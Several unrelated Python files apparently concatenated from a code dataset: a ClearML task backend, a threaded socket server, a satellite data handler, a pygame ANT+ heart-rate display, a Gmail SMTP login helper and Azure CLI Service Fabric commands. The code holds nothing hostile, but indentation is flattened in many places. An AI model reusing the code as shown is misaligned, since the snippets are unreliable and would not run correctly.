def _set_configuration(self, name, description=None, config_type=None, config_text=None, config_dict=None):
# type: (str, Optional[str], Optional[str], Optional[str], Optional[Mapping]) -> None
"""
Set Task configuration text/dict. Multiple configurations are supported.
:param str name: Configuration name.
:param str description: Configuration section description.
:param str config_type: Optional configuration format type (str).
:param config_text: model configuration (unconstrained text string). usually the content
of a configuration file. If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
        # make sure we have either dict or text
mutually_exclusive(config_dict=config_dict, config_text=config_text, _check_none=True)
if not Session.check_min_api_version('2.9'):
            raise ValueError("Multiple configurations are not supported with the current 'clearml-server', "
                             "please upgrade to the latest version")
if description:
description = str(description)
# support empty string
a_config = config_dict_to_text(config_dict if config_text is None else config_text)
with self._edit_lock:
self.reload()
configuration = self.data.configuration or {}
configuration[name] = tasks.ConfigurationItem(
name=name, value=a_config, description=description or None, type=config_type or None)
self._edit(configuration=configuration)
def _get_configuration_text(self, name):
# type: (str) -> Optional[str]
"""
Get Task configuration section as text
:param str name: Configuration name.
:return: The Task configuration as text (unconstrained text string).
return None if configuration name is not valid.
"""
if not Session.check_min_api_version('2.9'):
            raise ValueError("Multiple configurations are not supported with the current 'clearml-server', "
                             "please upgrade to the latest version")
configuration = self.data.configuration or {}
if not configuration.get(name):
return None
return configuration[name].value
def _get_configuration_dict(self, name):
# type: (str) -> Optional[dict]
"""
Get Task configuration section as dictionary
:param str name: Configuration name.
:return: The Task configuration as dictionary.
return None if configuration name is not valid.
"""
config_text = self._get_configuration_text(name)
if not config_text:
return None
return text_to_config_dict(config_text)
def get_offline_mode_folder(self):
# type: () -> (Optional[Path])
"""
Return the folder where all the task outputs and logs are stored in the offline session.
:return: Path object, local folder, later to be used with `report_offline_session()`
"""
if not self._offline_mode:
return None
return get_offline_dir(task_id=self.task_id)
@classmethod
def _clone_task(
cls,
cloned_task_id, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
execution_overrides=None, # type: Optional[dict]
tags=None, # type: Optional[Sequence[str]]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
log=None, # type: Optional[logging.Logger]
session=None, # type: Optional[Session]
):
# type: (...) -> str
"""
Clone a task
:param str cloned_task_id: Task ID for the task to be cloned
        :param str name: Name for the new task
:param str comment: Optional comment for the new task
:param dict execution_overrides: Task execution overrides. Applied over the cloned task's execution
section, useful for overriding values in the cloned task.
:param list tags: Optional updated model tags
:param str parent: Optional parent Task ID of the new task.
:param str project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:param logging.Logger log: Log object used by the infrastructure.
:param Session session: Session object used for sending requests to the API
        :return: The new task's ID.
"""
session = session if session else cls._get_default_session()
use_clone_api = Session.check_min_api_version('2.9')
if use_clone_api:
res = cls._send(
session=session, log=log,
req=tasks.CloneRequest(
task=cloned_task_id,
new_task_name=name,
new_task_tags=tags,
new_task_comment=comment,
new_task_parent=parent,
new_task_project=project,
execution_overrides=execution_overrides,
)
)
cloned_task_id = res.response.id
return cloned_task_id
res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id))
task = res.response.task
output_dest = None
if task.output:
output_dest = task.output.destination
execution = task.execution.to_dict() if task.execution else {}
execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution),
ConfigFactory.from_dict(execution_overrides or {}))
# clear all artifacts
execution['artifacts'] = [e for e in execution['artifacts'] if e.get('mode') == 'input']
if not hasattr(task, 'system_tags') and not tags and task.tags:
tags = [t for t in task.tags if t != cls._development_tag]
extra = {}
if hasattr(task, 'hyperparams'):
extra['hyperparams'] = task.hyperparams
if hasattr(task, 'configuration'):
extra['configuration'] = task.configuration
if getattr(task, 'system_tags', None):
extra['system_tags'] = [t for t in task.system_tags if t not in (cls._development_tag, cls.archived_tag)]
req = tasks.CreateRequest(
name=name or task.name,
type=task.type,
input=task.input if hasattr(task, 'input') else {'view': {}},
tags=tags,
comment=comment if comment is not None else task.comment,
parent=parent,
project=project if project else task.project,
output_dest=output_dest,
execution=execution.as_plain_ordered_dict(),
script=task.script,
**extra
)
res = cls._send(session=session, log=log, req=req)
cloned_task_id = res.response.id
if task.script and task.script.requirements:
cls._send(session=session, log=log, req=tasks.SetRequirementsRequest(
task=cloned_task_id, requirements=task.script.requirements))
return cloned_task_id
@classmethod
def get_all(cls, session=None, log=None, **kwargs):
# type: (Optional[Session], Optional[logging.Logger], **Any) -> Any
"""
        List all the Tasks based on a specific projection.
:param Session session: The session object used for sending requests to the API.
:param logging.Logger log: The Log object.
:param kwargs: Keyword args passed to the GetAllRequest
(see :class:`.backend_api.services.v2_5.tasks.GetAllRequest`)
For example:
            .. code-block:: py

                status='completed', search_text='specific_word', user='user_id', project='project_id'
:type kwargs: dict
:return: The API response.
"""
session = session if session else cls._get_default_session()
req = tasks.GetAllRequest(**kwargs)
res = cls._send(session=session, req=req, log=log)
return res
@classmethod
def get_by_name(cls, task_name):
# type: (str) -> Task
res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name)))
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(task_id=task.id)
@classmethod
def _get_project_name(cls, project_id):
res = cls._send(cls._get_default_session(), projects.GetByIdRequest(project=project_id), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
return res.response.project.name
def _get_all_events(
self, max_events=100, batch_size=500, order='asc', event_type=None, unique_selector=itemgetter("url")
):
# type: (int, int, str, str, Callable[[dict], Any]) -> Union[List[Any], Set[Any]]
"""
Get a list of all reported events.
Warning: Debug only. Do not use outside of testing.
:param max_events: The maximum events the function will return. Pass None
to return all the reported events.
:param batch_size: The maximum number of events retrieved by each internal call performed by this method.
:param order: Events order (by timestamp) - "asc" for ascending, "desc" for descending.
:param event_type: Event type. Pass None to get all event types.
:param unique_selector: If provided, used to select a value from each event, only a unique set of these
values will be returned by this method.
:return: A list of events from the task. If unique_selector was provided, a set of values selected from events
of the task.
"""
batch_size = max_events or batch_size
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order=order,
batch_size=batch_size,
event_type=event_type,
))
returned_count = log_events.response.returned
total_events = log_events.response.total
scroll = log_events.response.scroll_id
if unique_selector:
events_list = set(map(unique_selector, log_events.response.events))
else:
events_list = log_events.response.events
while returned_count < total_events and (max_events is None or len(events_list) < max_events):
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order=order,
batch_size=batch_size,
event_type=event_type,
scroll_id=scroll,
))
scroll = log_events.response.scroll_id
returned_count += log_events.response.returned
if unique_selector:
events_list.update(log_events.response.events)
else:
events_list.extend(log_events.response.events)
return events_list
@property
def _edit_lock(self):
# type: () -> ()
# skip the actual lock, this one-time lock will always enter
# only used on shutdown process to avoid deadlocks
if self.__edit_lock is False:
return RLock()
if self.__edit_lock:
return self.__edit_lock
if not PROC_MASTER_ID_ENV_VAR.get() or len(PROC_MASTER_ID_ENV_VAR.get().split(':')) < 2:
self.__edit_lock = RLock()
elif PROC_MASTER_ID_ENV_VAR.get().split(':')[1] == str(self.id):
filename = os.path.join(gettempdir(), 'clearml_{}.lock'.format(self.id))
# no need to remove previous file lock if we have a dead process, it will automatically release the lock.
# # noinspection PyBroadException
# try:
# os.unlink(filename)
# except Exception:
# pass
# create a new file based lock
self.__edit_lock = FileRLock(filename=filename)
else:
self.__edit_lock = RLock()
return self.__edit_lock
@_edit_lock.setter
def _edit_lock(self, value):
# type: (RLock) -> ()
self.__edit_lock = value
@classmethod
def __update_master_pid_task(cls, pid=None, task=None):
# type: (Optional[int], Union[str, Task]) -> ()
pid = pid or os.getpid()
if not task:
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':')
elif isinstance(task, str):
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + task)
else:
# noinspection PyUnresolvedReferences
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + str(task.id))
# make sure we refresh the edit lock next time we need it,
task._edit_lock = None
@classmethod
def __get_master_id_task_id(cls):
# type: () -> Optional[str]
master_task_id = PROC_MASTER_ID_ENV_VAR.get().split(':')
# we could not find a task ID, revert to old stub behaviour
if len(master_task_id) < 2 or not master_task_id[1]:
return None
return master_task_id[1]
@classmethod
def __is_subprocess(cls):
# type: () -> bool
# notice this class function is called from Task.ExitHooks, do not rename/move it.
is_subprocess = PROC_MASTER_ID_ENV_VAR.get() and \
PROC_MASTER_ID_ENV_VAR.get().split(':')[0] != str(os.getpid())
return is_subprocess
@classmethod
def set_offline(cls, offline_mode=False):
# type: (bool) -> ()
"""
        Set offline mode, where all data and logs are stored in a local folder, for later transmission.
:param offline_mode: If True, offline-mode is turned on, and no communication to the backend is enabled.
:return:
"""
if not running_remotely():
ENV_OFFLINE_MODE.set(offline_mode)
InterfaceBase._offline_mode = bool(offline_mode)
Session._offline_mode = bool(offline_mode)
@classmethod
def is_offline(cls):
# type: () -> bool
"""
        Return the offline-mode state. If in offline-mode, no communication to the backend is enabled.
:return: boolean offline-mode state
"""
return cls._offline_mode
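    # Hypothetical offline-mode sketch (assumes it is called before any task is
    # created in the process):
    #
    #     Task.set_offline(True)
    #     # ... run as usual; data is written under get_offline_mode_folder()
    #     assert Task.is_offline()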
@classmethod
def _get_task_status(cls, task_id):
# type: (str) -> (Optional[str], Optional[str])
if cls._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = cls._get_default_session().send(
tasks.GetAllRequest(id=[task_id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
|
server.py
|
import socket
import threading
HEADER = 64
PORT = 8080
SERVER = socket.gethostbyname(socket.gethostname())
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
ADDR = (SERVER, PORT)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(ADDR)
def handle_client(conn, addr):
print(f"[NEW CONNECTION] {addr} connected.")
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
            if msg == DISCONNECT_MESSAGE:
connected = False
print(f"[{addr}] {msg}")
conn.close()
def start():
server.listen()
print(f"[LISTENING] server is listening on {SERVER}")
while True:
        conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
        print(f"[ACTIVE CONNECTIONS] {threading.active_count() - 1}")
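# Hedged sketch of a matching client helper for the length-prefixed protocol
# above (not wired into the server; host/port default to the constants defined here).
def example_send(msg, host=SERVER, port=PORT):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((host, port))
    message = msg.encode(FORMAT)
    # send the message length first, padded to exactly HEADER bytes
    send_length = str(len(message)).encode(FORMAT)
    send_length += b' ' * (HEADER - len(send_length))
    client.send(send_length)
    # then send the payload itself
    client.send(message)
    client.close()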
print("[STARTING] server is starting...")
start()
|
emobdh.py
|
#!/usr/bin/python
import logging
import time
from threading import Thread
from subsystems.emgps import emGps
from subsystems.emimu import emImu
from subsystems.emtelemetry import emTelemetry
from sensors.emaltitude import emAltitudeGet
from sensors.empressure import emPressureGet
from sensors.emsealevelpressure import emSeaLevelPressureGet
from sensors.emtemperature import emTemperatureGet
class emObdh(object):
def __init__(self):
logging.info('On Board Data Handling')
self.emgpsfd = emGps()
self.emimu = emImu()
self.emtelemetry = emTelemetry()
thread = Thread(target=self.emObdhRefresh)
thread.start()
def emObdhSensors(self):
altitude = emAltitudeGet()
pressure = emPressureGet()
sealevelpressure = emSeaLevelPressureGet()
temperature = emTemperatureGet()
return altitude, pressure, sealevelpressure, temperature
def emObdhGps(self):
latitude = self.emgpsfd.emGpsLatitudeGet()
longitude = self.emgpsfd.emGpsLongitudeGet()
altitude = self.emgpsfd.emGpsAltitudeGet()
return latitude, longitude, altitude
def emObdhImu(self):
roll = self.emimu.emImuRollGet()
pitch = self.emimu.emImuPitchGet()
yaw = self.emimu.emImuYawGet()
return roll, pitch, yaw
def emObdhRefresh(self):
altitude, pressure, sealevelpressure, temperature = self.emObdhSensors()
sensorsdata = ("Sensors: {0}," "{1}," "{2}," "{3}".format( \
altitude, pressure, sealevelpressure, temperature))
logging.info(sensorsdata)
latitude, longitude, altitude = self.emObdhGps()
gpsdata = ("Gps: {0}," "{1}," "{2}".format( \
latitude, longitude, altitude))
logging.info(gpsdata)
roll, pitch, yaw = self.emObdhImu()
imudata = ("Imu: {0}," "{1}," "{2},".format(roll, pitch, yaw))
logging.info(imudata)
        datage = ("{0} {1} {2} {3} {4} {5} {6} {7}".format(
            latitude, longitude, altitude, pressure,
            temperature, roll, pitch, yaw))
logging.warning(datage)
self.emtelemetry.emTelemetrySend(datage)
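# Hypothetical usage sketch (assumes the subsystem/sensor modules imported above
# are available and logging is configured by the caller):
#
#     logging.basicConfig(level=logging.INFO)
#     obdh = emObdh()   # __init__ starts emObdhRefresh on a background thread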
# End of File
|
main.py
|
import os
#import logging
#logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
############ Magic Configs
target_fps = 30
size = (500, 200) # half of 200 is 100 for a nice midpoint
font_path = "Pixel LCD-7.ttf"
font_size = 40 # 140 for big mid screen, 40 for
fudge_factor = 1
line_width = 7
vert_scale = 10 # makes peaks bigger - change if you change the size
pulse_parts = [0,1,0,0,6,0,-5,0,0,-1,0,0,2,0] # distinctive heart beat
BACKGROUND_COLOR = (0,0,0,255)
LINE_COLOR = (0,255,0,250)
FONT_COLOR = (0,255,0)
fade_factor = 253 # number between 0 and 255. Probably 250-255 ish
def position_font(screen_size, text_size):
# middle of screen:
#return ((screen_size[0] - text_size[0] )// 2, (screen_size[1] - text_size[1])//2)
# Bottom right
return screen_size[0] - text_size[0] - 2 , screen_size[1] - text_size[1] - 2
############ DONT EDIT BELOW THIS
from datetime import datetime, timedelta
from time import sleep
from ant.easy.node import Node
from ant.easy.channel import Channel
from ant.base.message import Message
import threading
import pygame
## statics
NETWORK_KEY= [0xb9, 0xa5, 0x21, 0xfb, 0xbd, 0x72, 0xc3, 0x45]
pygame.init()
screen = pygame.display.set_mode(size, flags=pygame.NOFRAME)
pygame.display.set_caption("Heartbeat")
back_font = pygame.font.Font(font_path, font_size)
clock = pygame.time.Clock()
alive = True
HEART_EVENT_TYPE = pygame.event.custom_type()
# ANT stuff
def on_data(data):
heart_speed = data[7] * fudge_factor
print("Heart speed detected: %s" % heart_speed)
ev = pygame.event.Event(HEART_EVENT_TYPE, {'speed': heart_speed})
pygame.event.post(ev)
def back_thread(node):
node.set_network_key(0x00, NETWORK_KEY)
channel = node.new_channel(Channel.Type.BIDIRECTIONAL_RECEIVE)
channel.on_broadcast_data = on_data
channel.on_burst_data = on_data
# magic numbers
channel.set_period(16070) # was 8070
channel.set_search_timeout(20) # was 12
channel.set_rf_freq(57)
channel.set_id(0, 120, 0)
try:
channel.open()
node.start()
finally:
node.stop()
print("Ant Node shutdown complete")
node = Node()
x = threading.Thread(target=back_thread, args=(node,))
x.start()
last_seen = datetime.now()
drawing = pygame.Surface(screen.get_size(), flags=pygame.SRCALPHA)
drawing.fill((0,0,0,255))
alpha_surf = pygame.Surface(screen.get_size(), pygame.SRCALPHA)
alpha_surf.fill((255, 255, 255, fade_factor))
ptr = -1
last_height = 100
last_pulse = datetime.now()
pulse_time = 10
heart_speed = -1
offset = -1
fade_factor = 255
time_since_seen = timedelta(seconds=100)
while alive:
for event in pygame.event.get():
if event.type == pygame.QUIT:
            alive = False
node.stop()
elif event.type == HEART_EVENT_TYPE:
print("Heart speed detected! %s" % event.speed)
heart_speed = event.speed
if event.speed != 0:
pulse_time = 60 / event.speed
last_seen = datetime.now()
elif event.type == pygame.KEYDOWN:
            print("Key pressed - closing")
pygame.display.quit()
alive = False
node.stop()
time_since_seen = datetime.now() - last_seen
next_ptr = ptr + 5
screen.fill(BACKGROUND_COLOR)
#alpha_surf.fill((0,0,0,fade_factor))
now = datetime.now()
tt = now - last_pulse
if tt.total_seconds() > pulse_time:
offset = -1
last_pulse = now
offset += 1
#print(offset)
if offset >= len(pulse_parts)-1:
height = size[1]//2
else:
height = (size[1]//2) -(vert_scale * pulse_parts[offset])
#print(height)
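    # Fade-and-draw step: blitting alpha_surf with BLEND_RGBA_MULT multiplies the
    # trace's alpha by fade_factor/255 each frame, so older line segments fade out.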
if time_since_seen.total_seconds() < 10:
drawing.blit(alpha_surf, (0,0), special_flags=pygame.BLEND_RGBA_MULT)
pygame.draw.line(drawing, LINE_COLOR, [ptr, last_height], [next_ptr, height], line_width)
display_text = "%s" % round(heart_speed)
text = back_font.render(display_text, False, FONT_COLOR)
text_pos = position_font(size, (text.get_width(),text.get_height()))
screen.blit(text, text_pos)
screen.blit(drawing,(0,0))
pygame.display.flip()
if next_ptr > size[0]:
ptr = -5
else:
ptr = next_ptr
last_height = height
    clock.tick(target_fps)
|
authenticate.py
|
import smtplib, time, threading
from models.wash import cprint, cinput, cgpass
from models.data_generate import connInfo
from utils.verifyEmail import REGEX
from_ = cinput("Enter your email account: ", "lightwhite") #inputs for the email account from which the intended user wants to send the message
FROM = REGEX(from_) #checking for the valid email
password = cgpass("Enter the password associated with your email: ", "lightwhite") # input for the password (it will not be visible)
def authentication(From, Password):
host='smtp.gmail.com'
port=465
try:
        server = smtplib.SMTP_SSL(host, port) # start the SMTP session over implicit SSL/TLS on port 465
connectionInfo = threading.Thread(target=connInfo, args=(From,))
connectionInfo.start()
server.login(From, Password) # logging into the gmail account
connectionInfo.join()
return server
except smtplib.SMTPAuthenticationError:
time.sleep(3)
cprint("[!] Authentication failed: Invalid email or password!\n", "lightred")
server.quit()
exit()
except KeyboardInterrupt:
pass
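# Hedged usage sketch (assumes the helper modules above resolve): the SMTP session
# returned by authentication() can then be used and closed by the caller, e.g.
#
#     server = authentication(FROM, password)
#     server.sendmail(FROM, FROM, "Subject: test\r\n\r\nhello")
#     server.quit()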
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long,too-many-lines
import os
import time
from knack.log import get_logger
from OpenSSL import crypto
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
from azure.cli.core.util import CLIError, get_file_json, b64_to_hex
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac import GraphRbacManagementClient
from azure.keyvault import KeyVaultClient, KeyVaultAuthentication
from azure.mgmt.keyvault.models import (VaultProperties,
Sku as KeyVaultSku,
AccessPolicyEntry,
Permissions,
CertificatePermissions,
KeyPermissions,
SecretPermissions,
SkuName as KeyVaultSkuName)
from azure.keyvault.models import (CertificateAttributes,
CertificatePolicy,
ActionType,
KeyUsageType,
IssuerParameters,
KeyProperties,
LifetimeAction,
SecretProperties,
X509CertificateProperties,
Trigger,
Action)
from azure.mgmt.servicefabric.models import (ClusterUpdateParameters,
ClientCertificateThumbprint,
ClientCertificateCommonName,
SettingsSectionDescription,
SettingsParameterDescription,
NodeTypeDescription,
EndpointRangeDescription)
from azure.mgmt.network.models import (PublicIPAddress,
Subnet,
SubResource as NetworkSubResource,
InboundNatPool,
Probe,
PublicIPAddressDnsSettings,
LoadBalancer,
FrontendIPConfiguration,
BackendAddressPool,
LoadBalancingRule)
from azure.mgmt.compute.models import (VaultCertificate,
Sku as ComputeSku,
UpgradePolicy,
ImageReference,
ApiEntityReference,
VaultSecretGroup,
VirtualMachineScaleSetOSDisk,
VirtualMachineScaleSetVMProfile,
VirtualMachineScaleSetExtensionProfile,
VirtualMachineScaleSetOSProfile,
VirtualMachineScaleSetStorageProfile,
VirtualMachineScaleSet,
VirtualMachineScaleSetNetworkConfiguration,
VirtualMachineScaleSetIPConfiguration,
VirtualMachineScaleSetNetworkProfile,
SubResource,
UpgradeMode)
from azure.mgmt.storage.models import StorageAccountCreateParameters
from ._client_factory import (resource_client_factory,
keyvault_client_factory,
compute_client_factory,
storage_client_factory,
network_client_factory)
logger = get_logger(__name__)
DEFAULT_ADMIN_USER_NAME = "adminuser"
DEFAULT_SKU = "Standard_D2_V2"
DEFAULT_TIER = "Standard"
DEFAULT_OS = "WindowsServer2016Datacenter"
DEFAULT_CLUSTER_SIZE = 5
DEFAULT_DURABILITY_LEVEL = "Bronze"
DEFAULT_APPLICATION_START_PORT = 20000
DEFAULT_APPLICATION_END_PORT = 30000
DEFAULT_EPHEMERAL_START = 49152
DEFAULT_EPHEMERAL_END = 65534
DEFAULT_CLIENT_CONNECTION_ENDPOINT = 19000
DEFAULT_HTTP_GATEWAY_ENDPOINT = 19080
DEFAULT_TCP_PORT = 19000
DEFAULT_HTTP_PORT = 19080
DEFAULT_FRONTEND_PORT_RANGE_START = 3389
DEFAULT_FRONTEND_PORT_RANGE_END = 4500
DEFAULT_BACKEND_PORT = 3389
SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME = "servicefabricnode"
SERVICE_FABRIC_LINUX_NODE_EXT_NAME = "servicefabriclinuxnode"
SOURCE_VAULT_VALUE = "sourceVaultValue"
CERTIFICATE_THUMBPRINT = "certificateThumbprint"
CERTIFICATE_URL_VALUE = "certificateUrlValue"
SEC_SOURCE_VAULT_VALUE = "secSourceVaultValue"
SEC_CERTIFICATE_THUMBPRINT = "secCertificateThumbprint"
SEC_CERTIFICATE_URL_VALUE = "secCertificateUrlValue"
os_dic = {'WindowsServer2012R2Datacenter': '2012-R2-Datacenter',
'UbuntuServer1604': '16.04-LTS',
'WindowsServer2016DatacenterwithContainers': '2016-Datacenter-with-Containers',
'WindowsServer2016Datacenter': '2016-Datacenter'}
def list_cluster(client, resource_group_name=None):
cluster_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(cluster_list)
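# Hypothetical CLI usage sketch for the command backed by list_cluster (the
# 'az sf cluster' group name is taken from the error-message examples below):
#
#     az sf cluster list --resource-group myRg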
# pylint:disable=too-many-locals, too-many-statements, too-many-boolean-expressions, too-many-branches
def new_cluster(cmd,
client,
resource_group_name,
location,
certificate_subject_name=None,
parameter_file=None,
template_file=None,
cluster_name=None,
vault_resource_group_name=None,
vault_name=None,
certificate_file=None,
certificate_password=None,
certificate_output_folder=None,
secret_identifier=None,
vm_user_name=None,
vm_password=None,
cluster_size=None,
vm_sku=None,
vm_os=None):
cli_ctx = cmd.cli_ctx
if certificate_subject_name is None and certificate_file is None and secret_identifier is None:
raise CLIError(
'\'--certificate-subject-name\', \'--certificate-file\', \'--secret-identifier\', one of them must be specified')
if certificate_output_folder and certificate_file:
raise CLIError(
'\'--certificate-output-folder\' and \'--certificate-file\' can not be specified at same time')
if secret_identifier:
        if certificate_output_folder or certificate_file or vault_resource_group_name or certificate_password:
            raise CLIError(
                '\'--certificate-output-folder\', \'--certificate-file\', \'--vault-resource-group-name\' and \'--certificate-password\' can not be specified '
                'when \'--secret-identifier\' is specified')
if parameter_file or template_file:
if parameter_file is None or template_file is None:
raise CLIError('If using customize template to deploy,both \'--parameter-file\' and \'--template-file\' can not be None ' + '\n For example:\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json' +
'\n az sf cluster create --resource-group myRg --location westus --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate_file c:\\test.pfx' + '\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate-output-folder c:\\certoutput')
if cluster_size or vm_sku or vm_user_name:
raise CLIError('\'cluster_size\',\'vm_sku\',\'vm_os\',\'vm_user_name\' can not be specified when using customize template deployment')
else:
if vm_password is None:
raise CLIError('\'--vm-password\' could not be None')
if cluster_size is None:
cluster_size = DEFAULT_CLUSTER_SIZE
if vm_sku is None:
vm_sku = DEFAULT_SKU
if vm_os is None:
vm_os = DEFAULT_OS
if vm_user_name is None:
vm_user_name = DEFAULT_ADMIN_USER_NAME
rg = _get_resource_group_name(cli_ctx, resource_group_name)
if rg is None:
_create_resource_group_name(cli_ctx, resource_group_name, location)
if vault_name is None:
vault_name = resource_group_name
name = ""
for n in vault_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
if len(name) >= 21:
break
vault_name = name
if vault_resource_group_name is None:
vault_resource_group_name = resource_group_name
if cluster_name is None:
cluster_name = resource_group_name
if certificate_file:
_, file_extension = os.path.splitext(certificate_file)
if file_extension is None or file_extension.lower() != '.pfx'.lower():
raise CLIError('\'--certificate_file\' should be a valid pfx file')
import datetime
suffix = datetime.datetime.now().strftime("%Y%m%d%H%M")
deployment_name = 'AzurePSDeployment-' + suffix
vault_id = None
certificate_uri = None
cert_thumbprint = None
output_file = None
if parameter_file is None:
vm_os = os_dic[vm_os]
reliability_level = _get_reliability_level(cluster_size)
result = _create_certificate(cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
vault_id = result[0]
certificate_uri = result[1]
cert_thumbprint = result[2]
output_file = result[3]
linux = None
if vm_os == '16.04-LTS':
linux = True
template = _modify_template(linux)
parameters = _set_parameters_for_default_template(cluster_location=location,
cluster_name=cluster_name,
admin_password=vm_password,
certificate_thumbprint=cert_thumbprint,
vault_id=vault_id,
certificate_id=certificate_uri,
reliability_level=reliability_level,
admin_name=vm_user_name,
cluster_size=cluster_size,
durability_level=DEFAULT_DURABILITY_LEVEL,
vm_sku=vm_sku,
os_type=vm_os,
linux=linux)
else:
parameters, output_file = _set_parameters_for_customize_template(cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier,
parameter_file)
vault_id = parameters[SOURCE_VAULT_VALUE]['value']
certificate_uri = parameters[CERTIFICATE_URL_VALUE]['value']
cert_thumbprint = parameters[CERTIFICATE_THUMBPRINT]['value']
template = get_file_json(template_file)
logger.info("Validating the deployment")
validate_result = _deploy_arm_template_core(
cli_ctx, resource_group_name, template, parameters, deployment_name, 'incremental', True)
if validate_result.error is not None:
errors_detailed = _build_detailed_error(validate_result.error, [])
errors_detailed.insert(0, "Error validating template. See below for more information.")
raise CLIError('\n'.join(errors_detailed))
logger.info("Deployment is valid, and begin to deploy")
_deploy_arm_template_core(cli_ctx, resource_group_name, template,
parameters, deployment_name, 'incremental', False)
output_dict = {}
output_dict['vm_user_name'] = vm_user_name
output_dict['cluster'] = client.get(resource_group_name, cluster_name)
output_dict['certificate'] = {'certificate_file': output_file,
'vault_id': vault_id,
'certificate_identifier': certificate_uri,
'thumbprint': cert_thumbprint}
return output_dict
def _build_detailed_error(top_error, output_list):
if output_list:
output_list.append(' Inner Error - Code: "{}" Message: "{}"'.format(top_error.code, top_error.message))
else:
output_list.append('Error - Code: "{}" Message: "{}"'.format(top_error.code, top_error.message))
if top_error.details:
for error in top_error.details:
_build_detailed_error(error, output_list)
return output_list
def add_app_cert(cmd,
client,
resource_group_name,
cluster_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
cli_ctx = cmd.cli_ctx
result = _create_certificate(cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
_add_cert_to_all_vmss(cli_ctx, resource_group_name, result[0], result[1])
return client.get(resource_group_name, cluster_name)
def add_client_cert(client,
resource_group_name,
cluster_name,
is_admin=False,
thumbprint=None,
certificate_common_name=None,
certificate_issuer_thumbprint=None,
admin_client_thumbprints=None,
readonly_client_thumbprints=None,
client_certificate_common_names=None):
if thumbprint:
if certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names:
            raise CLIError(
                "--thumbprint can only be specified alone or with --is-admin")
if certificate_common_name or certificate_issuer_thumbprint:
if certificate_issuer_thumbprint is None or certificate_common_name is None:
raise CLIError(
"Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
if thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names or is_admin:
raise CLIError(
"Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
if admin_client_thumbprints or readonly_client_thumbprints:
if thumbprint or certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names or is_admin:
raise CLIError(
"Only \'--admin-client-thumbprints\' and \'--readonly-client-thumbprints\' can be specified together")
if client_certificate_common_names:
if is_admin or thumbprint or certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints: # pylint: disable=too-many-boolean-expressions
raise CLIError(
"\'--client-certificate-commonNames\' can only be specified alone")
cluster = client.get(resource_group_name, cluster_name)
def _add_thumbprint(cluster, is_admin, thumbprint):
remove = []
for t in cluster.client_certificate_thumbprints:
if t.certificate_thumbprint.lower() == thumbprint.lower():
remove.append(t)
for t in remove:
cluster.client_certificate_thumbprints.remove(t)
cluster.client_certificate_thumbprints.append(
ClientCertificateThumbprint(is_admin, thumbprint))
    def _add_common_name(cluster, is_admin, certificate_common_name, certificate_issuer_thumbprint):
        remove = None
        for t in cluster.client_certificate_common_names:
            if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
                remove = t
        if remove:
            cluster.client_certificate_common_names.remove(remove)
        cluster.client_certificate_common_names.append(ClientCertificateCommonName(
            is_admin, certificate_common_name, certificate_issuer_thumbprint))
return cluster.client_certificate_common_names
if thumbprint:
_add_thumbprint(cluster, is_admin, thumbprint)
